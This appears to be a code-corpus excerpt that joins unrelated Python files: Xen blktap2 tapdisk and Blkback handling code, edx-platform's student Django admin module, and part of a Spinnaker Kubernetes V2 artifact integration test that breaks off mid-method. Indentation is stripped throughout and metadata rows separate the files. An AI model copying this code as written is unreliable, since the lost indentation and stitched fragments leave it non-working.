if util.pathexists(local_leaf_path):
util.SMlog("Deleting local leaf node %s" % local_leaf_path)
os.unlink(local_leaf_path)
read_cache_path = "%s/%s.vhdcache" % (local_sr.path, shared_target.uuid)
prt_tapdisk = Tapdisk.find_by_path(read_cache_path)
if not prt_tapdisk:
util.SMlog("Parent tapdisk not found")
elif not self._is_tapdisk_in_use(prt_tapdisk.minor):
util.SMlog("Parent tapdisk not in use: shutting down %s" % \
read_cache_path)
try:
prt_tapdisk.shutdown()
except:
util.logException("shutting down parent tapdisk")
else:
util.SMlog("Parent tapdisk still in use: %s" % read_cache_path)
# the parent cache files are removed during the local SR's background
# GC run
lock.release()
PythonKeyError = KeyError
class UEventHandler(object):
def __init__(self):
self._action = None
class KeyError(PythonKeyError):
def __str__(self):
return \
"Key '%s' missing in environment. " % self.args[0] + \
"Not called in udev context?"
@classmethod
def getenv(cls, key):
try:
return os.environ[key]
except KeyError, e:
raise cls.KeyError(e.args[0])
def get_action(self):
if not self._action:
self._action = self.getenv('ACTION')
return self._action
class UnhandledEvent(Exception):
def __init__(self, event, handler):
self.event = event
self.handler = handler
def __str__(self):
return "Uevent '%s' not handled by %s" % \
(self.event, self.handler.__class__.__name__)
ACTIONS = {}
def run(self):
action = self.get_action()
try:
fn = self.ACTIONS[action]
except KeyError:
raise self.UnhandledEvent(action, self)
return fn(self)
def __str__(self):
try: action = self.get_action()
except: action = None
return "%s[%s]" % (self.__class__.__name__, action)
class __BlktapControl(ClassDevice):
SYSFS_CLASSTYPE = "misc"
def __init__(self):
ClassDevice.__init__(self)
self._default_pool = None
def sysfs_devname(self):
return "blktap!control"
class DefaultPool(Attribute):
SYSFS_NODENAME = "default_pool"
def get_default_pool_attr(self):
if not self._default_pool:
self._default_pool = self.DefaultPool.from_kobject(self)
return self._default_pool
def get_default_pool_name(self):
return self.get_default_pool_attr().readline()
def set_default_pool_name(self, name):
self.get_default_pool_attr().writeline(name)
def get_default_pool(self):
return BlktapControl.get_pool(self.get_default_pool_name())
def set_default_pool(self, pool):
self.set_default_pool_name(pool.name)
class NoSuchPool(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return "No such pool: %s", self.name
def get_pool(self, name):
path = "%s/pools/%s" % (self.sysfs_path(), name)
if not os.path.isdir(path):
raise self.NoSuchPool(name)
return PagePool(path)
BlktapControl = __BlktapControl()
class PagePool(KObject):
def __init__(self, path):
self.path = path
self._size = None
def sysfs_path(self):
return self.path
class Size(Attribute):
SYSFS_NODENAME = "size"
def get_size_attr(self):
if not self._size:
self._size = self.Size.from_kobject(self)
return self._size
def set_size(self, pages):
pages = str(pages)
self.get_size_attr().writeline(pages)
def get_size(self):
pages = self.get_size_attr().readline()
return int(pages)
class BusDevice(KObject):
SYSFS_BUSTYPE = None
@classmethod
def sysfs_bus_path(cls):
return "/sys/bus/%s" % cls.SYSFS_BUSTYPE
def sysfs_path(self):
path = "%s/devices/%s" % (self.sysfs_bus_path(),
self.sysfs_devname())
return path
class XenbusDevice(BusDevice):
"""Xenbus device, in XS and sysfs"""
XBT_NIL = ""
XENBUS_DEVTYPE = None
def __init__(self, domid, devid):
self.domid = int(domid)
self.devid = int(devid)
self._xbt = XenbusDevice.XBT_NIL
import xen.lowlevel.xs
self.xs = xen.lowlevel.xs.xs()
def xs_path(self, key=None):
path = "backend/%s/%d/%d" % (self.XENBUS_DEVTYPE,
self.domid,
self.devid)
if key is not None:
path = "%s/%s" % (path, key)
return path
def _log(self, prio, msg):
syslog(prio, msg)
def info(self, msg):
self._log(_syslog.LOG_INFO, msg)
def warn(self, msg):
self._log(_syslog.LOG_WARNING, "WARNING: " + msg)
def _xs_read_path(self, path):
val = self.xs.read(self._xbt, path)
#self.info("read %s = '%s'" % (path, val))
return val
def _xs_write_path(self, path, val):
self.xs.write(self._xbt, path, val);
self.info("wrote %s = '%s'" % (path, val))
def _xs_rm_path(self, path):
self.xs.rm(self._xbt, path)
self.info("removed %s" % path)
def read(self, key):
return self._xs_read_path(self.xs_path(key))
def has_key(self, key):
return self.read(key) is not None
def write(self, key, val):
self._xs_write_path(self.xs_path(key), val)
def rm(self, key):
self._xs_rm_path(self.xs_path(key))
def exists(self):
return self.has_key(None)
def begin(self):
assert(self._xbt == XenbusDevice.XBT_NIL)
self._xbt = self.xs.transaction_start()
def commit(self):
ok = self.xs.transaction_end(self._xbt, 0)
self._xbt = XenbusDevice.XBT_NIL
return ok
def abort(self):
ok = self.xs.transaction_end(self._xbt, 1)
assert(ok == True)
self._xbt = XenbusDevice.XBT_NIL
def create_physical_device(self):
"""The standard protocol is: toolstack writes 'params', linux hotplug
script translates this into physical-device=%x:%x"""
if self.has_key("physical-device"):
return
try:
params = self.read("params")
frontend = self.read("frontend")
is_cdrom = self._xs_read_path("%s/device-type") == "cdrom"
# We don't have PV drivers for CDROM devices, so we prevent blkback
# from opening the physical-device
if not(is_cdrom):
major_minor = os.stat(params).st_rdev
major, minor = divmod(major_minor, 256)
self.write("physical-device", "%x:%x" % (major, minor))
except:
util.logException("BLKTAP2:create_physical_device")
def signal_hotplug(self, online=True):
xapi_path = "/xapi/%d/hotplug/%s/%d/hotplug" % (self.domid,
self.XENBUS_DEVTYPE,
self.devid)
upstream_path = self.xs_path("hotplug-status")
if online:
self._xs_write_path(xapi_path, "online")
self._xs_write_path(upstream_path, "connected")
else:
self._xs_rm_path(xapi_path)
self._xs_rm_path(upstream_path)
def sysfs_devname(self):
return "%s-%d-%d" % (self.XENBUS_DEVTYPE,
self.domid, self.devid)
def __str__(self):
return self.sysfs_devname()
@classmethod
def find(cls):
pattern = "/sys/bus/%s/devices/%s*" % (cls.SYSFS_BUSTYPE,
cls.XENBUS_DEVTYPE)
for path in glob.glob(pattern):
name = os.path.basename(path)
(_type, domid, devid) = name.split('-')
yield cls(domid, devid)
class XenBackendDevice(XenbusDevice):
"""Xenbus backend device"""
SYSFS_BUSTYPE = "xen-backend"
@classmethod
def from_xs_path(cls, _path):
(_backend, _type, domid, devid) = _path.split('/')
assert _backend == 'backend'
assert _type == cls.XENBUS_DEVTYPE
domid = int(domid)
devid = int(devid)
return cls(domid, devid)
class Blkback(XenBackendDevice):
"""A blkback VBD"""
XENBUS_DEVTYPE = "vbd"
def __init__(self, domid, devid):
XenBackendDevice.__init__(self, domid, devid)
self._phy = None
self._vdi_uuid = None
self._q_state = None
self._q_events = None
class XenstoreValueError(Exception):
KEY = None
def __init__(self, vbd, _str):
self.vbd = vbd
self.str = _str
def __str__(self):
return "Backend %s " % self.vbd + \
"has %s = %s" % (self.KEY, self.str)
class PhysicalDeviceError(XenstoreValueError):
KEY = "physical-device"
class PhysicalDevice(object):
def __init__(self, major, minor):
self.major = int(major)
self.minor = int(minor)
@classmethod
def from_xbdev(cls, xbdev):
phy = xbdev.read("physical-device")
try:
major, minor = phy.split(':')
major = int(major, 0x10)
minor = int(minor, 0x10)
except Exception, e:
raise xbdev.PhysicalDeviceError(xbdev, phy)
return cls(major, minor)
def makedev(self):
return os.makedev(self.major, self.minor)
def is_tap(self):
return self.major == Tapdisk.major()
def __str__(self):
return "%s:%s" % (self.major, self.minor)
def __eq__(self, other):
return \
self.major == other.major and \
self.minor == other.minor
def get_physical_device(self):
if not self._phy:
self._phy = self.PhysicalDevice.from_xbdev(self)
return self._phy
class QueueEvents(Attribute):
"""Blkback sysfs node to select queue-state event
notifications emitted."""
SYSFS_NODENAME = "queue_events"
QUEUE_RUNNING = (1<<0)
QUEUE_PAUSE_DONE = (1<<1)
QUEUE_SHUTDOWN_DONE = (1<<2)
QUEUE_PAUSE_REQUEST = (1<<3)
QUEUE_SHUTDOWN_REQUEST = (1<<4)
def get_mask(self):
return int(self.readline(), 0x10)
def set_mask(self, mask):
self.writeline("0x%x" % mask)
def get_queue_events(self):
if not self._q_events:
self._q_events = self.QueueEvents.from_kobject(self)
return self._q_events
def get_vdi_uuid(self):
if not self._vdi_uuid:
self._vdi_uuid = self.read("sm-data/vdi-uuid")
return self._vdi_uuid
def pause_requested(self):
return self.has_key("pause")
def shutdown_requested(self):
return self.has_key("shutdown-request")
def shutdown_done(self):
return self.has_key("shutdown-done")
def running(self):
return self.has_key('queue-0/kthread-pid')
@classmethod
def find_by_physical_device(cls, phy):
for dev in cls.find():
try:
_phy = dev.get_physical_device()
except cls.PhysicalDeviceError:
continue
if _phy == phy:
yield dev
@classmethod
def find_by_tap_minor(cls, minor):
phy = cls.PhysicalDevice(Tapdisk.major(), minor)
return cls.find_by_physical_device(phy)
@classmethod
def find_by_tap(cls, tapdisk):
return cls.find_by_tap_minor(tapdisk.minor)
def has_tap(self):
if not self.can_tap():
return False
phy = self.get_physical_device()
if phy:
return phy.is_tap()
return False
def is_bare_hvm(self):
"""File VDIs for bare HVM. These are directly accessible by Qemu."""
try:
self.get_physical_device()
except self.PhysicalDeviceError, e:
vdi_type = self.read("type")
self.info("HVM VDI: type=%s" % vdi_type)
if e.str is not None or vdi_type != 'file':
raise
return True
return False
def can_tap(self):
return not self.is_bare_hvm()
class BlkbackEventHandler(UEventHandler):
LOG_FACILITY = _syslog.LOG_DAEMON
def __init__(self, ident=None, action=None):
if not ident: ident = self.__class__.__name__
self.ident = ident
self._vbd = None
self._tapdisk = None
UEventHandler.__init__(self)
def run(self):
self.xs_path = self.getenv('XENBUS_PATH')
openlog(str(self), 0, self.LOG_FACILITY)
UEventHandler.run(self)
def __str__(self):
try: path = self.xs_path
except: path = None
try: action = self.get_action()
except: action = None
return "%s[%s](%s)" % (self.ident, action, path)
def _log(self, prio, msg):
syslog(prio, msg)
util.SMlog("%s: " % self + msg)
def info(self, msg):
self._log(_syslog.LOG_INFO, msg)
def warn(self, msg):
self._log(_syslog.LOG_WARNING, "WARNING: " + msg)
def error(self, msg):
self._log(_syslog.LOG_ERR, "ERROR: " + msg)
def get_vbd(self):
if not self._vbd:
self._vbd = Blkback.from_xs_path(self.xs_path)
return self._vbd
def get_tapdisk(self):
if not self._tapdisk:
minor = self.get_vbd().get_physical_device().minor
self._tapdisk = Tapdisk.from_minor(minor)
return self._tapdisk
#
# Events
#
def __add(self):
vbd = self.get_vbd()
# Manage blkback transitions
# self._manage_vbd()
vbd.create_physical_device()
vbd.signal_hotplug()
@retried(backoff=.5, limit=10)
def add(self):
try:
self.__add()
except Attribute.NoSuchAttribute, e:
#
# FIXME: KOBJ_ADD is racing backend.probe, which
# registers device attributes. So poll a little.
#
self.warn("%s, still trying." % e)
raise RetryLoop.TransientFailure(e)
def __change(self):
vbd = self.get_vbd()
# 1. Pause or resume tapdisk (if there is one)
if vbd.has_tap():
pass
#self._pause_update_tap()
# 2. Signal Xapi.VBD.pause/resume completion
self._signal_xapi()
def change(self):
vbd = self.get_vbd()
# NB. Beware of spurious change events between shutdown
# completion and device removal. Also, Xapi.VM.migrate will
# hammer a couple extra shutdown-requests into the source VBD.
while True:
vbd.begin()
if not vbd.exists() or \
vbd.shutdown_done():
break
self.__change()
if vbd.commit():
return
vbd.abort()
self.info("spurious uevent, ignored.")
def remove(self):
vbd = self.get_vbd()
vbd.signal_hotplug(False)
ACTIONS = { 'add': add,
'change': change,
'remove': remove }
#
# VDI.pause
#
def _tap_should_pause(self):
"""Enumerate all VBDs on our tapdisk. Returns true iff any was
paused"""
tapdisk = self.get_tapdisk()
TapState = Tapdisk.PauseState
PAUSED = 'P'
RUNNING = 'R'
PAUSED_SHUTDOWN = 'P,S'
# NB. Shutdown/paused is special. We know it's not going
# to restart again, so it's a RUNNING. Still better than
# backtracking a removed device during Vbd.unplug completion.
next = TapState.RUNNING
vbds = {}
for vbd in Blkback.find_by_tap(tapdisk):
name = str(vbd)
pausing = vbd.pause_requested()
closing = vbd.shutdown_requested()
running = vbd.running()
if pausing:
if closing and not running:
vbds[name] = PAUSED_SHUTDOWN
else:
vbds[name] = PAUSED
next = TapState.PAUSED
else:
vbds[name] = RUNNING
self.info("tapdev%d (%s): %s -> %s"
% (tapdisk.minor, tapdisk.pause_state(),
vbds, next))
return next == TapState.PAUSED
def _pause_update_tap(self):
vbd = self.get_vbd()
if self._tap_should_pause():
self._pause_tap()
else:
self._resume_tap()
def _pause_tap(self):
tapdisk = self.get_tapdisk()
if not tapdisk.is_paused():
self.info("pausing %s" % tapdisk)
tapdisk.pause()
def _resume_tap(self):
tapdisk = self.get_tapdisk()
# NB. Raw VDI snapshots. Refresh the physical path and
# type while resuming.
vbd = self.get_vbd()
vdi_uuid = vbd.get_vdi_uuid()
if tapdisk.is_paused():
self.info("loading vdi uuid=%s" % vdi_uuid)
vdi = VDI.from_cli(vdi_uuid)
_type = vdi.get_tap_type()
path = vdi.get_phy_path()
self.info("resuming %s on %s:%s" % (tapdisk, _type, path))
tapdisk.unpause(_type, path)
#
# VBD.pause/shutdown
#
def _manage_vbd(self):
vbd = self.get_vbd()
# NB. Hook into VBD state transitions.
events = vbd.get_queue_events()
mask = 0
mask |= events.QUEUE_PAUSE_DONE # pause/unpause
mask |= events.QUEUE_SHUTDOWN_DONE # shutdown
# TODO: mask |= events.QUEUE_SHUTDOWN_REQUEST, for shutdown=force
# TODO: mask |= events.QUEUE_RUNNING, for ionice updates etc
events.set_mask(mask)
self.info("wrote %s = %#02x" % (events.path, mask))
def _signal_xapi(self):
vbd = self.get_vbd()
pausing = vbd.pause_requested()
closing = vbd.shutdown_requested()
running = vbd.running()
handled = 0
if pausing and not running:
if not vbd.has_key('pause-done'):
vbd.write('pause-done', '')
handled += 1
if not pausing:
if vbd.has_key('pause-done'):
vbd.rm('pause-done')
handled += 1
if closing and not running:
if not vbd.has_key('shutdown-done'):
vbd.write('shutdown-done', '')
handled += 1
if handled > 1:
self.warn("handled %d events, " % handled +
"pausing=%s closing=%s running=%s" % \
(pausing, closing, running))
if __name__ == '__main__':
import sys
prog = os.path.basename(sys.argv[0])
#
# Simple CLI interface for manual operation
#
# tap.* level calls go down to local Tapdisk()s (by physical path)
# vdi.* level calls run the plugin calls across host boundaries.
#
def usage(stream):
print >>stream, \
"usage: %s tap.{list|major}" % prog
print >>stream, \
" %s tap.{launch|find|get|pause|" % prog + \
"unpause|shutdown|stats} {[<tt>:]<path>} | [minor=]<int> | .. }"
print >>stream, \
" %s vbd.uevent" % prog
try:
cmd = sys.argv[1]
except IndexError:
usage(sys.stderr)
sys.exit(1)
try:
_class, method = cmd.split('.')
except:
usage(sys.stderr)
sys.exit(1)
#
# Local Tapdisks
#
if cmd == 'tap.major':
print "%d" % Tapdisk.major()
elif cmd == 'tap.launch':
tapdisk = Tapdisk.launch_from_arg(sys.argv[2])
print >> sys.stderr, "Launched %s" % tapdisk
elif _class == 'tap':
attrs = {}
for item in sys.argv[2:]:
try:
key, val = item.split('=')
attrs[key] = val
continue
except ValueError:
pass
try:
attrs['minor'] = int(item)
continue
except ValueError:
pass
try:
arg = Tapdisk.Arg.parse(item)
attrs['_type'] = arg.type
attrs['path'] = arg.path
continue
except Tapdisk.Arg.InvalidArgument:
pass
attrs['path'] = item
if cmd == 'tap.list':
for tapdisk in Tapdisk.list(**attrs):
blktap = tapdisk.get_blktap()
print tapdisk,
print "%s: task=%s pool=%s" % \
(blktap,
blktap.get_task_pid(),
blktap.get_pool_name())
elif cmd == 'tap.vbds':
# Find all Blkback instances for a given tapdisk
for tapdisk in Tapdisk.list(**attrs):
print "%s:" % tapdisk,
for vbd in Blkback.find_by_tap(tapdisk):
print vbd,
print
else:
if not attrs:
usage(sys.stderr)
sys.exit(1)
try:
tapdisk = Tapdisk.get(**attrs)
except TypeError:
usage(sys.stderr)
sys.exit(1)
if cmd == 'tap.shutdown':
# Shutdown a running tapdisk, or raise
tapdisk.shutdown()
print >> sys.stderr, "Shut down %s" % tapdisk
elif cmd == 'tap.pause':
# Pause an unpaused tapdisk, or raise
tapdisk.pause()
print >> sys.stderr, "Paused %s" % tapdisk
elif cmd == 'tap.unpause':
# Unpause a paused tapdisk, or raise
tapdisk.unpause()
print >> sys.stderr, "Unpaused %s" % tapdisk
elif cmd == 'tap.stats':
# Gather tapdisk status
stats = tapdisk.stats()
print "%s:" % tapdisk
print json.dumps(stats, indent=True)
else:
usage(sys.stderr)
sys.exit(1)
elif cmd == 'vbd.uevent':
hnd = BlkbackEventHandler(cmd)
if not sys.stdin.isatty():
try:
hnd.run()
except Exception, e:
hnd.error("Unhandled Exception: %s" % e)
import traceback
_type, value, tb = sys.exc_info()
trace = traceback.format_exception(_type, value, tb)
for entry in trace:
for line in entry.rstrip().split('\n'):
util.SMlog(line)
else:
hnd.run()
elif cmd == 'vbd.list':
for vbd in Blkback.find():
print vbd, \
"physical-device=%s" % vbd.get_physical_device(), \
"pause=%s" % vbd.pause_requested()
else:
usage(sys.stderr)
sys.exit(1)
| lgpl-2.1 | -5,769,786,515,209,374,000 | 30.340035 | 129 | 0.533656 | false |
hastexo/edx-platform | common/djangoapps/student/admin.py | 1 | 7348 | """ Django admin pages for student app """
from config_models.admin import ConfigurationModelAdmin
from django import forms
from django.contrib import admin
from django.contrib.admin.sites import NotRegistered
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.utils.translation import ugettext_lazy as _
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from student.models import (
CourseAccessRole,
CourseEnrollment,
CourseEnrollmentAllowed,
DashboardConfiguration,
LinkedInAddToProfileConfiguration,
PendingNameChange,
Registration,
RegistrationCookieConfiguration,
UserAttribute,
UserProfile,
UserTestGroup
)
from student.roles import REGISTERED_ACCESS_ROLES
from xmodule.modulestore.django import modulestore
User = get_user_model() # pylint:disable=invalid-name
class CourseAccessRoleForm(forms.ModelForm):
"""Form for adding new Course Access Roles view the Django Admin Panel."""
class Meta(object):
model = CourseAccessRole
fields = '__all__'
email = forms.EmailField(required=True)
COURSE_ACCESS_ROLES = [(role_name, role_name) for role_name in REGISTERED_ACCESS_ROLES.keys()]
role = forms.ChoiceField(choices=COURSE_ACCESS_ROLES)
def clean_course_id(self):
"""
Checking course-id format and course exists in module store.
This field can be null.
"""
if self.cleaned_data['course_id']:
course_id = self.cleaned_data['course_id']
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
raise forms.ValidationError(u"Invalid CourseID. Please check the format and re-try.")
if not modulestore().has_course(course_key):
raise forms.ValidationError(u"Cannot find course with id {} in the modulestore".format(course_id))
return course_key
return None
def clean_org(self):
"""If org and course-id exists then Check organization name
against the given course.
"""
if self.cleaned_data.get('course_id') and self.cleaned_data['org']:
org = self.cleaned_data['org']
org_name = self.cleaned_data.get('course_id').org
if org.lower() != org_name.lower():
raise forms.ValidationError(
u"Org name {} is not valid. Valid name is {}.".format(
org, org_name
)
)
return self.cleaned_data['org']
def clean_email(self):
"""
Checking user object against given email id.
"""
email = self.cleaned_data['email']
try:
user = User.objects.get(email=email)
except Exception:
raise forms.ValidationError(
u"Email does not exist. Could not find {email}. Please re-enter email address".format(
email=email
)
)
return user
def clean(self):
"""
Checking the course already exists in db.
"""
cleaned_data = super(CourseAccessRoleForm, self).clean()
if not self.errors:
if CourseAccessRole.objects.filter(
user=cleaned_data.get("email"),
org=cleaned_data.get("org"),
course_id=cleaned_data.get("course_id"),
role=cleaned_data.get("role")
).exists():
raise forms.ValidationError("Duplicate Record.")
return cleaned_data
def __init__(self, *args, **kwargs):
super(CourseAccessRoleForm, self).__init__(*args, **kwargs)
if self.instance.user_id:
self.fields['email'].initial = self.instance.user.email
@admin.register(CourseAccessRole)
class CourseAccessRoleAdmin(admin.ModelAdmin):
"""Admin panel for the Course Access Role. """
form = CourseAccessRoleForm
raw_id_fields = ("user",)
exclude = ("user",)
fieldsets = (
(None, {
'fields': ('email', 'course_id', 'org', 'role',)
}),
)
list_display = (
'id', 'user', 'org', 'course_id', 'role',
)
search_fields = (
'id', 'user__username', 'user__email', 'org', 'course_id', 'role',
)
def save_model(self, request, obj, form, change):
obj.user = form.cleaned_data['email']
super(CourseAccessRoleAdmin, self).save_model(request, obj, form, change)
@admin.register(LinkedInAddToProfileConfiguration)
class LinkedInAddToProfileConfigurationAdmin(admin.ModelAdmin):
"""Admin interface for the LinkedIn Add to Profile configuration. """
class Meta(object):
model = LinkedInAddToProfileConfiguration
# Exclude deprecated fields
exclude = ('dashboard_tracking_code',)
@admin.register(CourseEnrollment)
class CourseEnrollmentAdmin(admin.ModelAdmin):
""" Admin interface for the CourseEnrollment model. """
list_display = ('id', 'course_id', 'mode', 'user', 'is_active',)
list_filter = ('mode', 'is_active',)
raw_id_fields = ('user',)
search_fields = ('course__id', 'mode', 'user__username',)
def queryset(self, request):
return super(CourseEnrollmentAdmin, self).queryset(request).select_related('user')
class Meta(object):
model = CourseEnrollment
class UserProfileInline(admin.StackedInline):
""" Inline admin interface for UserProfile model. """
model = UserProfile
can_delete = False
verbose_name_plural = _('User profile')
class UserAdmin(BaseUserAdmin):
""" Admin interface for the User model. """
inlines = (UserProfileInline,)
def get_readonly_fields(self, *args, **kwargs):
"""
Allows editing the users while skipping the username check, so we can have Unicode username with no problems.
The username is marked read-only regardless of `ENABLE_UNICODE_USERNAME`, to simplify the bokchoy tests.
"""
django_readonly = super(UserAdmin, self).get_readonly_fields(*args, **kwargs)
return django_readonly + ('username',)
@admin.register(UserAttribute)
class UserAttributeAdmin(admin.ModelAdmin):
""" Admin interface for the UserAttribute model. """
list_display = ('user', 'name', 'value',)
list_filter = ('name',)
raw_id_fields = ('user',)
search_fields = ('name', 'value', 'user__username',)
class Meta(object):
model = UserAttribute
@admin.register(CourseEnrollmentAllowed)
class CourseEnrollmentAllowedAdmin(admin.ModelAdmin):
""" Admin interface for the CourseEnrollmentAllowed model. """
list_display = ('email', 'course_id', 'auto_enroll',)
search_fields = ('email', 'course_id',)
class Meta(object):
model = CourseEnrollmentAllowed
admin.site.register(UserTestGroup)
admin.site.register(Registration)
admin.site.register(PendingNameChange)
admin.site.register(DashboardConfiguration, ConfigurationModelAdmin)
admin.site.register(RegistrationCookieConfiguration, ConfigurationModelAdmin)
# We must first un-register the User model since it may also be registered by the auth app.
try:
admin.site.unregister(User)
except NotRegistered:
pass
admin.site.register(User, UserAdmin)
| agpl-3.0 | 6,108,567,337,956,617,000 | 31.950673 | 117 | 0.64657 | false |
skim1420/spinnaker | testing/citest/tests/kube_v2_artifact_test.py | 1 | 17011 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Integration test to see if the image promotion process is working for the
Spinnaker Kubernetes V2 integration.
"""
# Standard python modules.
import sys
import random
import string
# citest modules.
import citest.kube_testing as kube
import citest.json_contract as jc
import citest.json_predicate as jp
import citest.service_testing as st
# Spinnaker modules.
import spinnaker_testing as sk
import spinnaker_testing.gate as gate
import spinnaker_testing.frigga as frigga
import citest.base
ov_factory = jc.ObservationPredicateFactory()
class KubeV2ArtifactTestScenario(sk.SpinnakerTestScenario):
"""Defines the scenario for the kube v2 artifact test.
"""
@classmethod
def new_agent(cls, bindings):
"""Implements citest.service_testing.AgentTestScenario.new_agent."""
agent = gate.new_agent(bindings)
agent.default_max_wait_secs = 180
return agent
@classmethod
def initArgumentParser(cls, parser, defaults=None):
"""Initialize command line argument parser.
Args:
parser: argparse.ArgumentParser
"""
super(KubeV2ArtifactTestScenario, cls).initArgumentParser(
parser, defaults=defaults)
defaults = defaults or {}
parser.add_argument(
'--test_namespace', default='default',
help='The namespace to manage within the tests.')
def __init__(self, bindings, agent=None):
"""Constructor.
Args:
bindings: [dict] The data bindings to use to configure the scenario.
agent: [GateAgent] The agent for invoking the test operations on Gate.
"""
super(KubeV2ArtifactTestScenario, self).__init__(bindings, agent)
bindings = self.bindings
# We'll call out the app name because it is widely used
# because it scopes the context of our activities.
# pylint: disable=invalid-name
self.TEST_APP = bindings['TEST_APP']
# Take just the first if there are multiple
# because some uses below assume just one.
self.TEST_NAMESPACE = bindings['TEST_NAMESPACE'].split(',')[0]
self.mf = sk.KubernetesManifestFactory(self)
self.mp = sk.KubernetesManifestPredicateFactory()
self.ps = sk.PipelineSupport(self)
def create_app(self):
"""Creates OperationContract that creates a new Spinnaker Application."""
contract = jc.Contract()
return st.OperationContract(
self.agent.make_create_app_operation(
bindings=self.bindings, application=self.TEST_APP,
account_name=self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT']),
contract=contract)
def delete_app(self):
"""Creates OperationContract that deletes a new Spinnaker Application."""
contract = jc.Contract()
return st.OperationContract(
self.agent.make_delete_app_operation(
application=self.TEST_APP,
account_name=self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT']),
contract=contract)
def __docker_image_artifact(self, name, image):
id_ = ''.join(random.choice(string.ascii_uppercase + string.digits)
for _ in range(10))
return {
'type': 'docker/image',
'name': name,
'reference': image,
'uuid': id_
}
def deploy_unversioned_config_map(self, value):
"""Creates OperationContract for deploying an unversioned configmap
To verify the operation, we just check that the configmap was created with
the correct 'value'.
"""
name = self.TEST_APP + '-configmap'
manifest = self.mf.config_map(name, {'value': value})
manifest['metadata']['annotations'] = {'strategy.spinnaker.io/versioned': 'false'}
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'type': 'deployManifest',
'user': '[anonymous]',
'manifests': [manifest],
}],
description='Deploy manifest',
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('ConfigMap created',
retryable_for_secs=15)
.get_resources(
'configmap',
extra_args=[name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.config_map_key_value_predicate('value', value)))
return st.OperationContract(
self.new_post_operation(
title='deploy_manifest', data=payload, path='tasks'),
contract=builder.build())
def deploy_deployment_with_config_map(self, versioned):
"""Creates OperationContract for deploying a configmap along with a deployment
mounting this configmap.
To verify the operation, we just check that the deployment was created with
the correct configmap mounted
"""
deployment_name = self.TEST_APP + '-deployment'
deployment = self.mf.deployment(deployment_name, 'library/nginx')
configmap_name = self.TEST_APP + '-configmap'
configmap = self.mf.config_map(configmap_name, {'key': 'value'})
if not versioned:
configmap['metadata']['annotations'] = {'strategy.spinnaker.io/versioned': 'false'}
self.mf.add_configmap_volume(deployment, configmap_name)
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'type': 'deployManifest',
'user': '[anonymous]',
'manifests': [deployment, configmap],
}],
description='Deploy manifest',
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('Deployment created',
retryable_for_secs=15)
.get_resources(
'deploy',
extra_args=[deployment_name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.deployment_configmap_mounted_predicate(configmap_name)))
return st.OperationContract(
self.new_post_operation(
title='deploy_manifest', data=payload, path='tasks'),
contract=builder.build())
def deploy_config_map(self, version):
"""Creates OperationContract for deploying a versioned configmap
To verify the operation, we just check that the deployment was created with
the correct image.
"""
bindings = self.bindings
name = self.TEST_APP + '-configmap'
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'type': 'deployManifest',
'user': '[anonymous]',
'manifests': [self.mf.config_map(name, {'version': version})],
}],
description='Deploy manifest',
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('ConfigMap created',
retryable_for_secs=15)
.get_resources(
'configmap',
extra_args=[name + '-' + version, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.config_map_key_value_predicate('version', version)))
return st.OperationContract(
self.new_post_operation(
title='deploy_manifest', data=payload, path='tasks'),
contract=builder.build())
def save_configmap_deployment_pipeline(self, pipeline_name, versioned=True):
deployment_name = self.TEST_APP + '-deployment'
deployment = self.mf.deployment(deployment_name, 'library/nginx')
configmap_name = self.TEST_APP + '-configmap'
configmap = self.mf.config_map(configmap_name, {'key': 'value'})
if not versioned:
configmap['metadata']['annotations'] = {'strategy.spinnaker.io/versioned': 'false'}
self.mf.add_configmap_volume(deployment, configmap_name)
configmap_stage = {
'refId': 'configmap',
'name': 'Deploy configmap',
'type': 'deployManifest',
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'manifests': [configmap],
}
deployment_stage = {
'refId': 'deployment',
'name': 'Deploy deployment',
'requisiteStageRefIds': ['configmap'],
'type': 'deployManifest',
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'manifests': [deployment],
}
return self.ps.submit_pipeline_contract(pipeline_name, [configmap_stage, deployment_stage])
def execute_deploy_manifest_pipeline(self, pipeline_name):
deployment_name = self.TEST_APP + '-deployment'
configmap_name = self.TEST_APP + '-configmap'
bindings = self.bindings
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'type': 'manual',
'user': '[anonymous]'
}],
description='Deploy manifest in ' + self.TEST_APP,
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
